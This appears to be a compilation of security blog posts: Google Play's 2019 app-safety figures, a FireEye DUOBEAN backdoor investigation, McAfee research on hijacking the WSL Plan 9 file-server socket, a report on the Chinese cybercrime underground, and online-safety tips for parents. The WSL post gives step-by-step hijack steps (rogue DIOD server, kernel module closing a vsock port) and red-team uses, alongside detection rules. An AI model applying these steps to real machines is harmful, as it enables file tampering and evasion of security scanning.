11th ANNUAL NICE CONFERENCE AND EXPO SAVE THE DATE: November 16-18, 2020 LOCATION: Atlanta, Georgia Visit the Conference website We are excited to announce that this year’s Conference and Expo will take place on November 16 - 18, 2020 at the Hilton Atlanta in Atlanta, GA. For more information about the conference, visit niceconference.org This event is supported by the National Initiative for Cybersecurity Education (NICE), a program of the National Institute of Standards and Technology in the U.S. Department of Commerce, under a Cooperative Agreement (Award# 70NANB18H025). Learn more at

How we fought bad apps and malicious developers in 2019


Posted by Andrew Ahn, Product Manager, Google Play + Android App Safety
[Cross-posted from the Android Developers Blog]

Google Play connects users with great digital experiences to help them be more productive and entertained, as well as providing app developers with tools to reach billions of users around the globe. Such a thriving ecosystem can only be achieved and sustained when trust and safety is one of its key foundations. Over the last few years we’ve made the trust and safety of Google Play a top priority, and have continued our investments and improvements in our abuse detection systems, policies, and teams to fight against bad apps and malicious actors.
In 2019, we continued to strengthen our policies (especially to better protect kids and families), continued to improve our developer approval process, initiated a deeper collaboration with security industry partners through the App Defense Alliance, enhanced our machine learning detection systems analyzing an app’s code, metadata, and user engagement signals for any suspicious content or behaviors, as well as scaling the number and the depth of manual reviews. The combination of these efforts have resulted in a much cleaner Play Store:
  • Google Play released a new policy in 2018 to stop apps from unnecessarily accessing privacy-sensitive SMS and Call Log data. We saw a significant, 98% decrease in apps accessing SMS and Call Log data as developers partnered with us to update their apps and protect users. The remaining 2% are comprised of apps that require SMS and Call Log data to perform their core function.
  • One of the best ways to protect users from bad apps is to keep those apps out of the Play Store in the first place. Our improved vetting mechanisms stopped over 790,000 policy-violating app submissions before they were ever published to the Play Store.
  • Similarly to our SMS and Call Log policy, we also enacted a policy to better protect families in May 2019. After putting this in place, we worked with developers to update or remove tens of thousands of apps, making the Play Store a safer place for everyone.
In addition we’ve launched a refreshed Google Play Protect experience, our built-in malware protection for Android devices. Google Play Protect scans over 100B apps everyday, providing users with information about potential security issues and actions they can take to keep their devices safe and secure. Last year, Google Play Protect also prevented more than 1.9B malware installs from non-Google Play sources.
While we are proud of what we were able to achieve in partnership with our developer community, we know there is more work to be done. Adversarial bad actors will continue to devise new ways to evade our detection systems and put users in harm's way for their own gains. Our commitment in building the world's safest and most helpful app platform will continue in 2020, and we will continue to invest in the key app safety areas mentioned in last year’s blog post:
  • Strengthening app safety policies to protect user privacy
  • Faster detection of bad actors and blocking repeat offenders
  • Detecting and removing apps with harmful content and behaviors
Our teams of passionate product managers, engineers, policy experts, and operations leaders will continue to work with the developer community to accelerate the pace of innovation, and deliver a safer app store to billions of Android users worldwide.

Managed Defense: The Analytical Mindset

When it comes to cyber security (managed services or otherwise), you’re ultimately reliant on analyst expertise to keep your environment safe. Products and intelligence are necessary pieces of the security puzzle to generate detection signal and whittle down the alert chaff, but in the end, an analyst’s trained eyes and investigative process are the deciding factors in effectively going from alerts to answers in your organization.

This blog post highlights the events of a recent investigation by FireEye Managed Defense to showcase the investigative tooling and analysis process of our analysts.

Threat Overview

Recently, FireEye Managed Defense responded to a suspected China-nexus threat group campaign targeting the transportation, construction, and media sectors in Southeast Asia. FireEye’s investigative findings uncovered previously unseen malware, DUOBEAN, a backdoor that solicits additional modules from command-and-control (C2) infrastructure and injects them into process memory.

Initial Lead

Our initial lead for this activity originated from threat hunting in Managed Defense, which identified a ZIP archive containing a malicious LNK file with embedded PowerShell commands to download and inject a malicious payload into victim process memory. The attachment was blocked by a FireEye ETP appliance in Southeast Asia, but network indicators for the payload were extracted for monitoring suspicious infrastructure.

When IP addresses are tasked for monitoring, our network sensors record traffic observed to the suspicious destination for further analysis by our Managed Defense team during threat hunting activities. When new leads from monitored traffic have been collected, our analysts use an internal tool, MDASH, as a dashboard for exploring suspicious network activity.

Analyst Perspective

With mountains of evidence available from endpoint telemetry and network traffic, it’s critical to interrogate artifacts with purposeful lines of questioning in order to respond to threat actor activity as effectively as possible without getting lost in the data.

In this engagement, we have the initial lead for DUOBEAN activity being a tracked IP address that has generated a lead for hunting. Given this type of evidence, there’s a few questions we’re interested in answering before looking at the PCAP contents.

Why did we start monitoring this indicator?

The most important action an analyst can take when evaluating any indicator is understanding what it is trying to detect. For FireEye, the monitored network infrastructure is commented by the author to provide necessary context for analysts that review generated leads.

In this case, our team identified that a recent sample of CHAINLNK from a blocked ETP attachment in Southeast Asia beaconed to infrastructure serving the same SSL certificate. Related infrastructure reusing SSL certificates were enumerated when a malicious domain was gathered from the payload and scoped using PassiveTotal to identify SSL certificates associated with the IP. Certificate SHA-1 was then searched against PassiveTotal results to identify an additional network asset serving the same certificate. This overlapping certificate use is illustrated in Figure 1.


Figure 1: Suspicious infrastructure observed in hunting activity

How long have we been tracking this IP Address?

IP addresses can be some of the most volatile indicators in the world of security. The operational cost for an attacker to transition infrastructure is nominal, so the accuracy of the indicator will decrease as time marches on.

In this instance, the IP address had only been monitored for seven (7) days which increased the credibility of the indicator given the relative freshness.

What’s the prevalence of this activity?

Prevalence of traffic to an IP address gives us a baseline for normalcy. Large volumes of traffic from multiple varying hosts in multiple organizations changes our frame of reference to be less suspicious about the activity, while traffic from a few consistent internal hosts at one or few clients would be more consistent with targeted attacker activity.

In this engagement, we observed six (6) hosts from one organization making consistent HTTPS requests (without response) to the infrastructure. This limited scope would be consistent with more suspicious activity.

How frequently is activity being observed?

Frequency of traffic informs an analyst of whether the activity is programmatic or interactive. Identical activity at consistent intervals is not something humans can easily replicate. Although malware regularly uses variable lengths of time for beaconing, consistent outbound requests in cadence are telling us that some programmatic task is occurring to generate the activity, not a user session.

In this engagement, we observed outbound traffic occurring from all six (6) hosts at 15 minute intervals which was indicative of programmatic activity initiating the requests.

How much information is being passed between these hosts?

Strictly looking at netflow information, the byte size and directionality of the traffic will also inform your analysis on what you’re observing. Small consistently sized outbound packets tends to be more representative of beaconing traffic (legitimate or otherwise), while varied request/response sizes with frequency communication suggests interactivity.

In this engagement, we observed only a few bytes of outbound traffic on each of the hosts, consistent with beaconing.

Without looking at the packets, our line of questioning against the flow data already begins to characterize the content as highly suspicious. Looking at the network capture content (Figure 2), we observe that the outbound traffic gathered is strictly TLS Client Hello traffic to a free domain, which are commonly employed by attackers.


Figure 2: TLS Client Hello from packet capture

Given the findings from the hunting investigation, the Managed Defense team immediately informed the customer that further endpoint analysis was going to be performed on the six (6) host communicating with the suspicious infrastructure. At the time, the customer was not instrumented with FireEye Endpoint Security, so portable collections were captured for each of the hosts and securely uploaded to the Managed Defense team for analysis.

Further Analysis

Endpoint collections containing Windows file system metadata, Windows Registry, Windows Event Logs, web browser history, and a process listing with active network connections were gathered for Managed Defense analysts.

Windows Event Logs by themselves can have hundreds of thousands if not millions of entries. As an analyst, it’s increasingly important to be specific in what questions you’re looking to answer during endpoint investigations. In this case, we have one leading question to begin our investigation: What application is regularly communicating with our suspicious infrastructure?

Active network connections indicated that legitimate Windows binary, “msiexec.exe”, was responsible for the network connection to the suspicious infrastructure. This information was also included in detailed process tracking evidence (EID 4688) from Windows Event Logs listed in Figure 3.


Figure 3: Windows Event Log detailing suspicious use of “msiexec.exe”

The legitimate application “msiexec.exe”, is responsible for command-line installation and modification of Windows Installer applications (*.msi files), and rarely makes network connections. From an analyst’s perspective, the low occurrence of network activity in standard use from this binary elicits suspicions of process injection. The parent process in this instance is also in a minimally privileged %AppData%\Roaming directory commonly used for malware persistence. 

As an analyst, we’re confident at this point that malicious activity is occurring on the host. Our line of questioning now transitions from exploring the source of network traffic to discovering the scope of the compromise on the host. To triage, we will use the following line of questioning:

What is it?

For this question, we’re interested in understanding the attacker behavior on the victim computer, specifically the malware in this investigation. This includes functionality and persistence mechanisms used.

With our initial lead being the potential staging directory of %AppData%\Roaming from the Windows Event Log listing, we’ll first look at any files created within a few minutes of “eeclnt.exe”. A Mandiant Redline listing of the files returned from filtering the directory is shown in Figure 4.


Figure 4: Mandiant Redline file listing from potential staging directory, %Appdata%\Roaming

Three (3) suspicious files in question are returned “eeclnt.exe”, “MSVCR110.dll”, and “MSVCR110.dat”. These files are uploaded to the FLARE team’s internal malware sandbox, Horizon, for further analysis.

PE File information indicates that “eeclnt.exe” is a legitimate copy of the ESET Smart Security binary with a required import of “MSVCR110.dll”. “MSVCR110.dll” supplementary library required for applications developed with Microsoft Visual C++. In this case, “MSVCR110.dll” was replaced with a malicious loader DLL. When “eeclnt.exe” executes, it imports the malicious DLL “MSVCR110.dll”, which loads the backdoor contained in “MSVCR110.dat” into “msiexec.exe” process memory through process hollowing. This technique is called “sideloading” and is commonly used by attackers to evade detection by using legitimate executables to run malicious code.

After initial triage from a Managed Defense analyst, the backdoor was passed along to our FLARE team to reverse engineer for additional identification of malware functionality and family identification. In this case, the backdoor was previously unseen so the Managed Defense analyst who identified the malware named it DUOBEAN.

How does it persist?

On Windows hosts, malware normally persists in one of three ways: Registry “Run” keys that run a specific application anytime a specific user (in some cases any user) authenticate into the workstation. Windows Services, long-standing background processes typically started at machine boot; and scheduled tasks that run an arbitrary command or binary at a designated interval.

In this case, by filtering for the sideloaded binary, “eeclnt.exe”, we quickly identified a Windows Service, “Software Update”, created around the file creation timestamp that maintained persistence for the DUOBEAN backdoor.

How did it get there?

This can be one of the more challenging questions to answer in the investigative world. With limited data retention times and rolling log data, the initial vector is not always easily discerned.

In this case, pivoting to look at browser history and file system modification around the time the DUOBEAN backdoor was created on the victim endpoint led us to our answers. Mandiant Redline output to detail the timeline of initial compromise is displayed in Figure 5.


Figure 5: Mandiant Redline output containing the host initial compromise timeline

The timeline of events shows that the user was phished from their personal Gmail, opening the password protected CHAINLNK attachment delivered from a OneDrive link embedded in the email. Malicious PowerShell commands observed from Windows Event Logs contained in Figure 6 following the activity indicate that CHAINLNK successfully executed and downloaded DUOBEAN.


Figure 6: Malicious CHAINLNK PowerShell commands observed in Windows Event Logs

No further activity was identified from this host based on the investigative evidence provided, and Managed Defense continued to scope the environment for additional indicators of compromise. This specific threat actor was detected early in the attack lifecycle which limited the impact of the threat actor and enabled Managed Defense to guide the victim organization through a quick remediation.

Summary

The China-nexus threat actor activity detailed above expanded to multiple customers, and eventually escalated to a Managed Defense Community Protection Event (CPE). CPEs are rapidly progressing campaigns targeting multiple customers with substantial potential for business impact. Managed Defense customers are immediately notified of CPE activity, indicators are deployed to monitor customer products, and the Managed Defense Consulting team provides insight on how to mitigate risk.

Regardless of the scale of your investigation, time is of the essence. Drowning under investigative data without a clear line of questioning buys attackers additional time to impose their agenda on your organization. Remember, products and intelligence are components of your security practice, but expertise is required in order to transform those inputs into an effective response.

Knock, Knock – Who’s There?

A Windows Linux Subsystem Interop Analysis

Following our research from Evil Twins and Windows Linux Subsystem, interoperability between different WSL versions was something that caught our attention. The protocol and mechanism to do file management from/to WSL is a must for Blue and Red Teams whose research will provide new ways to execute known techniques to achieve tactics such as Persistence, Defense Evasion and Execution, among others.

It is important (even if not seen today in regular arsenals) to understand how to protect, detect and react to this attack surface which could be widely spread in the future where WSL could be a de-facto component in every Enterprise machine.

Since Windows 10 version 1903, it is possible to access Linux files from Windows by using the \wsl$[DistroName] path syntax using 9P protocol. During our research, we found some design issues in WSLv1 that were propagated to WSLv2 — even though the core component differs. The main issue involves the lack of security control in the WSL communication object, leading to any user owning the instance to own the listening Planet 9 File System server. At first sight, this may look obvious, but once you control that communication, different ways of using the data being sent back and forth from Windows to the container begin to emerge.

It is important to mention that when running inside an isolated environment like WSLV2, certain activities not crossing boundaries may remain hidden for security products, but once an attempt to execute a malicious app on the Windows side is detected, the scanning mechanism provided by MVISION Endpoint and ENS will trigger to protect. MVISION EDR will provide visibility and detection on some of these artifacts. At the end of this article, we present certain objects to monitor to detect such cases in your organization.

Potential usages for Red Teams and  Researchers:

  • Persistence by hiding the real content, especially on WSLv2 where the root folder is a VHDX image.
  • Protocol fuzzing for discovering vulnerabilities on the implementation.
  • Security bypass by using \\wsl$ syntax in applications that have options to disable Network Folders scan and thus, do not consider this as a local path. (McAfee MVision Endpoint will consider this special path).
  • File tampering (the user accesses a file expecting some content, but it is changed during the transfer).

P9 Server Hijack Pre-Requisites:

  • WSL Enabled
  • Same user privileges as the WSL instance
  • A P9 compatible server

In the following section P9 (Planet 9 File System Protocol) and 9P (the protocol) are used interchangeably

WSLv1 and P9

The communication is done using an AF_UNIX socket (local file) that is currently owned by the user executing the WSL instance. The socket is created by the custom init process. Processes from the Windows side use a p9driver to access that socket by using an implementation of the P9 FileSystem instead of accessing the files as “Windows local”.

Note: Plan 9 has several implementations; currently the format supported by Windows is L / W.

A simple string on init shows that:

  1. The first WSL instance will open the p9 server for that distribution.
  2. Init has an embed server that creates a Unix socket into the distro path.
  3. The Unix socket is used to communicate.
  4. Whenever \\wsl$\ is accessed, P9 driver starts the communication.
  5. A P9 client communicates with the server.

Now, is that fsserver file protected? No! That means that we can hijack that socket and start our P9 server (in this case, I used DIOD as the main source) and from there… the options are endless from protocol fuzzers to trigger something unexpected, to protection bypass, to something very simple that just serves different content than expected.

To find programmatically the fsserver root location using PowerShell:

From there, the next step would be to start our p9 server from WSL (assuming the path was provided as the script argument as shown above):

In this example, next time we access \\wsl$\Debian, it will serve the files from mynewroot.

The below screenshot shows the full procedure using a modified P9 server:

  1. DIOD listening on the local socket.
  2. WSL directory listing before the hijack.
  3. WSL directory listing after the hijack.

At the time we were working on this, WSLv2 was announced and available in the latest Win10 Update. The next question was obvious—can we still do the same, given that the instance is now hosting a real kernel due to its nature of being hosted as a Hyper-V internal instance?

WSLv2 and P9

Now that there is a Linux Kernel the real “p9 Linux” module is activated. C: drive is mounted using P9 with several rdfd/wdfd arguments on top of drvfs.

The host is at CID:2, and ports  50000/1/2 are used for InterOp Messages and instance control.

Back to work — there are some steps to follow to determine whether we can achieve the same P9 Server Hijack or not.

  • Scan open ports listening on WSLv2 instance (a starting point could be modifying sample client code to became a scanner).
  1. Find the instance UID (an option is to check the task manager and wslhost.exe command line).
  2. Scan the instance!

3. Hey! Port 0x405(1029d) is open, let us Knock-Knock to find who is there.

  • P9 server port found… let us go hijack!!!
    1. Listening to the same port as with WSLv1 is not possible , unless we find a way to bypass the restrictions (app/module not using reuseaddr/port, not possible to close from user-space, etc.).
    2. We cannot kill init nor unload the module serving the files, so our best bet would be to close the port from the kernel. At the end of the day, it is our instance and we login as root .
    3. Let us create a vsock module that will:
      1. List current vsock connected sockets.
      2. Close a socket listening on a certain port.

  1. Compile the module using kernel source.
  2. Test it! (Note that same ports are not present and should be fixed, but for what we want the output is enough).

3)   Now, we are free to go, but still, we need to start our P9 DIODserver listening somehow on that port using a VSOCK socket. Since `socat` supports this type of socket it will be a piece of cake.

  • Access \\wsl$\DistributionName and voila!

Protection and Detection with McAfee Products

In Addition to rules related to WSL presented in previous posts, McAfee products provide several ways to detect and protect against P9 hijacking:

  • MVISION Endpoint will scan \\wsl$\ even if network scanning is disabled, so from the execution perspective on Windows side protection will still apply.
  • By using Endpoint Security Expert Rules it’s possible to block execution from WSL paths.
  • To configure Active Response (WSLv1) follow the below steps:
    • Setup a trigger to be notified of this situation a file fsserver is deleted.
      • File Trigger with condition: Files name equals fsserver”
    • Files collector if enabled, looking for fsserver modifications.
      • “Files where Files name equals fsserver”

In MVISION EDR (WSLv1), the file collector should be enabled and looking for wsl.conf modifications (files where files name equals “fsserver”

As a final note, we expect this post to provide new insights about the future exploration of these key areas, mostly considering that WSLv1 and WSLv2 can be converted online and both versions will be fairly used during the next years.

References:

  1. http://doc.cat-v.org/plan_9/misc/ubiquitous_fileserver/
  2. http://9p.io/magic/man2html/5/intro
  3. https://github.com/chaos/diod/blob/master/protocol.md
  4. https://w4mhi.wordpress.com/complete-hyper-v-socket-client-code/
  5. https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service
  6. https://tyranidslair.blogspot.com/2019/07/digging-into-wsl-p9-file-system.html
  7. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/
  8. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/the-twin-journey-part-1/

 

The post Knock, Knock – Who’s There? appeared first on McAfee Blogs.

NICE Director Participates as Witness During U.S. House of Representatives Committee on Science, Space, and Technology Hearing

Rodney Petersen, the Director of the National Initiative for Cybersecurity Education (NICE), participated as a witness during the House Science Subcommittee on Research and Technology hearing on “More Hires, Fewer Hacks: Developing the U.S. Cybersecurity Workforce”. Rodney shared information on NIST’s efforts to energize and promote a robust network and an ecosystem of cybersecurity education, training, and workforce development through the NICE program. Other topics were also highlighted such as the Regional Alliances and Multistakeholder Partnerships to Stimulate (RAMPS) Cybersecurity

How Chinese Cybercriminals Use Business Playbook to Revamp Underground

Preface

Because of its longevity and technical sophistication, the Russian cybercriminal underground has long been the benchmark for threat researchers focused on studying cybercrime tactics and techniques; there is a plethora of publications dedicated to analyzing its economy and hacking forums. However, only a handful of studies have centered on the emerging threats and trends from other, less prominent, cybercriminal undergrounds.

Recent data shows that the Chinese cybercriminal underground’s profits exceeded US$15.1 billion in 2017, while causing more than $13.3 billion worth of damage relating to data loss, identity theft and fraud. Over the years, the McAfee Advanced Programs Group (APG) has observed Chinese non-state threat actor groups gradually transform from small local networks targeting mostly Chinese businesses and citizens to large, well-organized criminal groups capable of hacking international organizations.

The development of commercial-scale exploit toolkits and criminal networks that focus on monetization of malware have amplified the growing risks of cybercrime in the Asia Pacific region to include a DDoS attack against the People’s Bank of China in December 2013, a $1 billion SWIFT hack against Bangladesh Bank in February 2016 and a $60 million theft from Far Eastern International Bank in Taiwan in October 2017, to name just a few.

This blog provides a rare glimpse inside the Chinese cybercriminal underground. Analyzing its current business models and techniques has yielded insights into the drastic changes in its operations, including the tactics and strategies it is borrowing from Russian cybercriminals.

Timeline: The Rise of the Chinese Cybercriminal Underground

China established its first cable connection to the world wide web in 1994, around the same time as cybercrime syndicates from Russia and other emerging cybercriminal undergrounds were executing their first major cybercrimes. Chinese leaders have since prioritized the development and acceleration of Internet technologies and, today, the size of China’s Internet use is massive and unparalleled at 800 million users.

However, this growth in Internet usage is not without irony as it has been accompanied by a significant increase in cybercriminal activity. Despite the Chinese government placing high importance on running one of the world’s most sophisticated Internet censorship systems, local cybercriminals are finding workarounds that contribute to China having one of the fastest growing cybercriminal underground economies.

China’s cybercrime enterprise is large, lucrative and expanding quickly. According to 2018 Internet Development Statistics, China’s cybercriminal underground was worth more than US $15 billion, nearly twice the size of its information security industry. The same Chinese-language source also shows that China’s cybercrime is growing at a rate of more than 30 percent a year. An estimated 400,000 people work in underground cybercriminal networks.

Changes in Tactics, Techniques and Procedures

In order to quickly scale up their businesses and maximize return on investment (ROI), Chinese cybercriminals have continuously adapted their tactics, techniques and procedures (TTPs). One significant change is that Chinese cybercriminals are slowly moving away from a high degree of one-to-one engagement through China’s popular QQ instant messaging platform to now establishing more formal cybercriminal networks. These networks use centralized advertising and standard service processes similar to Russian and other more sophisticated cybercriminal underground forums. Cybercriminals can access these centralized networks hosting on the deep web to post their products and services. A large amount of stolen data is available via automated services, where carders can order the credit and debit card information they want without having to interact with another user. With regard to hacking services, Chinese cybercriminals also offer modules for prospective clients to fill out their service requests, including types of attacks, target IP addresses, desirable malware or exploit toolkits and online payment processing. Through establishing a standardized model of sale, Chinese cybercriminals can expand their activity quickly without incurring additional overhead costs.

Attacks-as-a-service

Similar to other prominent cybercrime underworlds, Chinese cybercriminal underground markets are focused on providing excellent customer service. Many of the hackers expand their working hours to include weekends and even provide 24/7 technical support for customers who do not have a technical background. Distributed Denial of Service (DDoS) botnets, traffic sales, source code writing services, email/SMS spam and flooding services are available on the Chinese black markets.

Despite government censorship, a small number of Chinese cybercriminals still use dark web marketplaces to offer their services and products. Those marketplaces are typically specialized in the commercialization of stolen personally identifiable information (PII), bank accounts with high balances, hacking services, and malware customization. However, these darknet markets or hacking forums are not easily accessible because the Chinese government blocks the Tor anonymity network. A large number of Chinese cybercriminals continue to use exclusive and opaque QQ groups, Weibo fora and Baidu Teiba for advertising and communication. Chinese cybercriminals are also active on the clearnet. To avoid government censors and crackdowns, Chinese cybercriminals extensively use slang or other linguistic tactics for communication and advertising, which can be difficult for outsiders to comprehend. For instance, Chinese cybercriminals call a compromised computer or server “chicken meat.” Stolen bank accounts, credit card passwords, or other hijacked accounts are referred to as either “letters” or “envelopes.” Malicious websites and email accounts used for credential phishing attacks or spamming are referred to as “boxes.” Stolen information or details stored in the back of the magnetic stripe of a bank card are referred to as “data”, “track material” or simply “material.”

Moving Operational Base Abroad

Another noticeable trend is that an increasing number of Chinese cybercriminal gangs are moving their operational base abroad, using cryptocurrencies to launder money. They appear to prefer countries and jurisdictions with weak cybercrime legislation or weak enforcement, such as Malaysia, Indonesia, Cambodia and the Philippines. Since 2017, China’s Ministry of Public Security has uncovered over 5,000 cases of cross-border telecommunication fraud involving more than US $150 million. Some of the cybercriminal groups are highly structured and work as traditional mafia-like groups that engage delinquent IT professionals; some Chinese cybercrime gangs are well-structured with clear divisions of labor and multiple supply chains. Members are typically located in close geographic proximity, even when the attacks are transnational.

Unique Culture and Practices

Chinese hackers employ different payment methods, recruiting strategies, and operating structures from other cybercriminal undergrounds. AliPay and bank transfers are the generally accepted payment methods advertised by Chinese-language hacking forums; many other forums typically prefer Monero and Bitcoin.

The “Master-Apprentice Mechanism,” which is a form of mentorship, plays a significant role in the Chinese hacking communities. Many Chinese hacker groups utilize the strategy to recruit new members or make profits. As shown in the following graph, QQ hacking group masters, usually masterminds of an organized crime group or an administrator of a hacking community, collect training fees from the members they recruit. These members, known as “apprentices” or “hackers-in-training” are required to participate in multiple criminal “missions” before they complete the training programs. Once training is complete, they are eligible to upgrade to full-time hackers working for their masters and responsible for downstream operations, such as targeted attacks, website hacking and database exfiltration.

Figure 2: Master-Apprentice Mechanism (Source: Author)

Growth of Chinese Cybercrime

The Chinese cybercriminal underground has gone through drastic changes over the years. It gradually transformed from small local networks, targeting mostly Chinese businesses or citizens, to larger and well-organized criminal groups capable of hacking international organizations. My research indicates that there has been a growing threat activity targeting individuals and organizations in South Korea, Taiwan, Singapore, Germany, Canada and the United States. Chinese cybercriminals offer a wide variety of goods and services, ranging from physical counterfeit of US and Canadian driver’s licenses, scans of counterfeit US and Canadian driver’s licenses, US cell phone numbers, credit cards and identification cards to stolen social media and email accounts.

Figure 3: Growth of Chinese cybercrime (Source: Author)

As shown in the following screenshots, 1 million stolen US emails accounts with encrypted passwords are selling for US $117; 1.9 million stolen German email accounts with clear text passwords are available on the Chinese black market for US $400. Counterfeit or scans of US or Canadian passports or drivers licenses are also for sale for as little as US $13.

Figure 4: 1 million US email accounts with encrypted passwords are for sale in the Chinese cybercriminal underground
Figure 5: 1.9 million stolen German email accounts with clear text passwords are for sale in the Chinese cybercriminal underground
Figure 6: Chinese cybercriminals sell physical counterfeit of Canadian driver’s licenses

As shown in the following screenshot, Chinese hackers are also selling stolen personal data, including identification cards and passports from Taiwan and South Korean citizens.

Figure 7: Stolen PII from Taiwanese citizens, including national identification numbers, physical addresses, cell phone numbers, etc. are for sale in the Chinese cybercriminal underground
Figure 8: Chinese hackers selling 17 million South Korean national identification numbers

Login credentials for banks around the world are available on the Chinese cybercriminal underground market, and the higher the available balance of an account, the higher its selling price. Packages of hacked accounts from major US social media companies and networking platforms, gaming service providers, as well as media service providers are sold for as little as US $29 in the underground cybercrime market. These social media accounts are sometimes hacked with the intention of using them as a way to generate fake accounts to ensnare even more web users. A large number of email accounts from Taiwanese (i.e., @yahoo.com.tw) and South Korean email service providers (i.e., @nate.com, @yahoo.com.kr) are being sold on the Chinese black market.

Increasingly Difficult to Separate Cybercrime From Cyberespionage Activity

As the Chinese cybercriminal underground quickly expands its scope and sophistication, it is increasingly difficult to separate cybercrime from cyber espionage activity. This is especially true as I observe that Chinese cybercriminals offer services to spy on businesses and sell commodities that can be used to target businesses or government officials for economic and political espionage purposes. One of the most interesting items I found for sale in the Chinese cybercriminal underground is a full business dossier on Chinese companies and government agencies. Some Chinese hackers sell internal employee directories from high-profile technology companies. Chinese cybercriminals appear to work with malicious insiders or hire hackers to work as undercover agents inside of telecommunications service providers, financial services and technology companies to steal company secrets or other proprietary information. Documents include detailed contact information of CEOs and senior management from China’s top 50 companies. Other business proprietary information, such as credentials associated with a company’s various bank accounts, funding history, marketing strategies, and Tax Identification Number (TIN) are also available for sale on the black market. Malicious actors can use the above-mentioned information to launch targeted attacks against a business or leverage third-party vulnerabilities, such as trusted financial services, staffing firms and IT service providers to infiltrate a target system.

Conclusion

China’s cybercrime networks are rapidly growing in scope and sophistication. Compared to my earlier research paper on China’s cybercriminal underground from three years ago, Chinese cybercriminals have begun to embrace a sophisticated business-model approach and develop complex hierarchies, partnerships and collaboration with cybercriminal groups at home and internationally. These globally operating and organized cybercrime networks are basing themselves in countries with weak legal systems and law enforcement, while taking full advantage of global Internet connectivity to attack targets worldwide. A growing number of Chinese cybercriminals from these networks leverage the deep web to host their infrastructure and sell illegal goods and services, instead of relying on traditional peer-to-peer engagement through the QQ platform. To accelerate profitability, the Chinese hacking community has adopted tactics and techniques similar to Russian and other prominent cybercriminal underground markets to become more structured and service-oriented. In contrast, the Russian cybercriminal networks have been known for their multi-faceted criminal organizational structure specialized in monetizing PII theft and financial fraud. Yet, China’s cybecriminal underground, on the other hand, has placed greater emphasis on community and discipleship in achieving financial gains. Many of China’s cybercriminal networks incorporate this discipleship, also known as the “master-apprentice mechanism”, into a recruiting strategy that is largely different from their Russian counterparts. As China’s cybercrime continues to evolve and advance, international organizations operating in the Asia Pacific region are facing an expanding threat landscape from cybercriminal activity targeting high-value business assets. Intellectual property and identity theft can also cause substantial economic consequences.

The post How Chinese Cybercriminals Use Business Playbook to Revamp Underground appeared first on McAfee Blogs.

Intelligence in the Enterprise

Intelligence became an integral military discipline centuries ago. More recently, this practice evolved into what is called Intelligence Preparation of the Battlefield, or IPB. In both military and civilian agencies, the discipline uses information collection followed by analysis to provide guidance and direction to operators making tactical or organizational decisions. Used strategically, this type of intelligence puts an organization in a stronger position to operate offensively or defensively because in theory, they now know more than their enemy.

This same concept can be applied in the theater of cybersecurity operations. However, the current scope of intelligence in many enterprises describes just one aspect of the IPB discipline: information collection. The critical component missing to complete the process is a specialized researcher trained in this type of analysis and subsequent application of intelligence.

A disciplined intelligence cycle goes deep—applying advanced data collection methodologies from open, closed and propriety sources, social media, human intelligence and the dark web against areas such as cybercrime, hactivism, or cyber espionage to thoroughly analyze the adversary. Intelligence can ultimately be used to prepare organizations tactically and strategically to both anticipate and mitigate modern threats.

The latest research and analysis from McAfee Advanced Program Group (APG) researcher Anne An detailing the actions of Chinese non-state threat actor groups is a great example of intelligence that is invaluable for organizations. This unique take on Chinese cyber criminality educates practitioners on the threats around them, empowering them to prepare their organization to be proactive, rather than reactive. Further, there are many times where organizations are unaware they have been a victim of a cyberattack. This could include stolen data, which McAfee APG may find being sold on the dark markets, and in some cases, could have a devastating effect on their business.

Sun Tzu, the Chinese general, and military strategist once articulated, “The art of war teaches us to rely not on the likelihood of the enemy’s not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.”  These ancient words are still very meaningful today. If organizations robustly embrace the intelligence process, their defensive posture will exponentially improve.

 

The post Intelligence in the Enterprise appeared first on McAfee Blogs.

Safer Internet Day 2020

What Can You Do To Make The Internet a Better Place

In 2020, you’d be hard-pressed to find an Aussie teen who doesn’t spend a fair whack of their time online. And while many of us parents don’t always love the time our offspring spend glued to screens, most of us have come to accept that the online world is a big part of our kids’ lives.

So, let’s accept that the internet is going to be a feature of our kids’ lives and work out how best we can keep them safe.

Together For A Better Internet

Today is Safer Internet Day  – an international annual event that encourages us all to work together for a better internet. The perfect opportunity to find out what we can do as parents to ensure our kids are as safe as possible online.

Organised by the joint Insafe/INHOPE network, with the support of the European Commission, Safer Internet Day is held each February to promote the safe and positive use of digital technology, especially among children and young people. Safer Internet Day is all about inspiring users to make positive changes online, to raise awareness of online safety issues, and participate in events and activities right across the globe.

What Can We Do As Parents?

As role models and life-educators, parents play an enormous role in shaping our kids’ behaviours and opinions – particularly before they get to the teenage years!! So, why not use Safer Internet Day as a prompt to freshen up your cybersafety chats with your brood.

Not sure where to start? Here are my top messages to weave into your chats with your kids

  1. Be Kind Online

Spread love not hate online. A better internet includes building an online culture where people share positive and encouraging posts and comments. It may be as simple as posting a positive message, liking a post that is encouraging or sharing an inspiring article. Image

It may sound obvious but before you post a comment or a tweet, ask yourself whether the message could offend someone or impact them negatively. And remember to NEVER like, favourite, retweet, post or comment negatively online.

  1. Learn How To Disagree Respectfully Online

No matter how much we try, there will always be some people online who get a kick out of being unkind. If you come across this behaviour, I encourage you to call it out and report it but ALWAYS do so in a respectful fashion. Reciprocating with harsh words or name-calling will only further inflame a toxic situation. A logical, factual response that is respectful will always triumph!

  1. Protecting Your Online Reputation (& Others Too)

If you’re planning on hiring someone or even going on a date with someone, the chances are you’re going to ‘Google’ them first. And what you find online and the opinion you form decides whether the person’s digital reputation is acceptable or not.

So, it’s essential to remember that everything you post online is permanent and public; not to post inappropriate comments or pics of yourself or others; ensure all your online profiles are set to private to avoid strangers ‘screen-grabbing’ your private info and photos; don’t respond to inappropriate requests and most importantly, take a breather when things are getting heated online and you may regret your comments and actions.

  1. Passwords!!!!!

Managing passwords is one of the best ways of taking control of your online life and creating a better internet. Ensuring you have a separate password for every online account means that if you are affected by a data breach, your other online accounts are not at risk. Always choose passwords that have letters, numbers and symbols and ensure they are complex and not obvious. I love using a nonsensical sentence! And if all that’s too hard, why not consider a password manager that not only creates complex passwords for each of your online accounts but remembers them too. All you need to do is remember the master password! Awesome!!

So, why not pledge to change up your cybersafety chats with your kids this Safer Internet Day? And remember – they are watching you too! So, ensure you always model online respect, take your online responsibilities seriously and, also manage your passwords carefully. Because every little step is a step towards a positive change.
